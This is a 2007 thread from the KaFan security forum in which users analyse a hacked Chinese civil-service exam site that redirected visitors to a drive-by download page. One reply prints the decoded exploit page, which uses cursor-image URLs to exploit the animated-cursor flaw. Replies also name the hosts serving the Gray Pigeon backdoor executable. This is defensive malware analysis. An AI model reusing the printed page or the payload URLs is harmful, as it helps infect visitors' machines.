查看: 3428|回复: 17
收起左侧

[病毒样本] 中国公考网

[复制链接]
jimmyleo
发表于 2007-3-30 22:51:52 | 显示全部楼层 |阅读模式
http://www.chinagwy.com/

粗略分析了下 不知道漏掉什么没有


原网站首页 通过漏洞下载js[1].exe
并被iframe到hxxp://www.tyoutdoor.com/tygoods/admin/index.html
上面网页经过加密
ASC处理后其实是调用了指针图象
指针图象打不开 原文件好象不存在了 无法继续
用到加密 指向源估计是作了手脚的



样本扔上

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
小邪邪
发表于 2007-3-30 22:58:40 | 显示全部楼层
那个样本AVK报杀:灰鸽子
dikex
发表于 2007-3-30 23:04:50 | 显示全部楼层
那个网页经过ASCII处理即可得到源代码,看内容,貌似是传说中的利用鼠标指针漏洞的网马!!!
http://www.hzpp.com/kh/ss/ss1.jpg
http://www.hzpp.com/kh/ss/ss2.jpg
下载这两个看看



  1. <HTML><HEAD>
  2. <META http-equiv=Content-Type content="text/html; charset=big5">
  3. <META content="MSHTML 6.00.2900.3059" name=GENERATOR></HEAD>
  4. <BODY>
  5. <DIV style="CURSOR: url('http://www.hzpp.com/kh/ss/ss1.jpg')">
  6. <DIV
  7. style="CURSOR: url('http://www.hzpp.com/kh/ss/ss2.jpg')"></DIV></DIV></BODY></HTML>
  8. <script type="text/jscript">
  9. function init() {
  10. document.write("The time is: " + Date() );
  11. }
  12. window.onload = init;
  13. </script>
复制代码
dikex
发表于 2007-3-30 23:07:06 | 显示全部楼层
果然,打开那两个所谓的jpg文件后在最下面看到了病毒的地址
http://hacker.80069.cn/wawa/js.exe
鸽子一只
jimmyleo
 楼主| 发表于 2007-3-30 23:09:05 | 显示全部楼层
恩 我已经进行到这步了
可是貌似源文件 不存在
xpn282
发表于 2007-3-30 23:09:54 | 显示全部楼层
这种天毒网太多了...
我隔壁家的阿姨总是问我..我家的电脑平时都没做什么.上网习惯很好的.也还经常中木马 ......我偷笑....

然后我就对她说只要你用IE上网就会有木马..阿姨以后都不敢开其他网页了....
哎~~~~阿姨平时在家都没什么事做..闷时上上网都不安宁...那些挂马网站真是连老人家都不放过
小邪邪
发表于 2007-3-30 23:10:21 | 显示全部楼层
呵呵,其实我早试过了
打开www.tyoutdoor.com/tygoods/admin/index.html

咖啡立即报警
同时会看到网页上几乎一片空白,只显示:The time is: Fri Mar 30 23:08:34 2007

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
dikex
发表于 2007-3-30 23:11:10 | 显示全部楼层
原帖由 jimmyleo 于 2007-3-30 23:09 发表
恩 我已经进行到这步了
可是貌似源文件 不存在


用记事本等文字编辑器打开那个jpg文件就能看到了
jimmyleo
 楼主| 发表于 2007-3-30 23:16:02 | 显示全部楼层
原来兜兜转转 那个下载下来的JS就是它啊 兜了这么大的圈子……
jimmyleo
 楼主| 发表于 2007-3-30 23:18:51 | 显示全部楼层
被iframe到hxxp://www.tyoutdoor.com/tygoods/admin/index.html
网页经过加密
ASC处理后其实是调用了指针图象
利用漏洞指针图象末尾插入了真正的病毒并下载


样本为加密的网页和下载的JS。EXE
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-3-29 09:08 , Processed in 0.111352 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表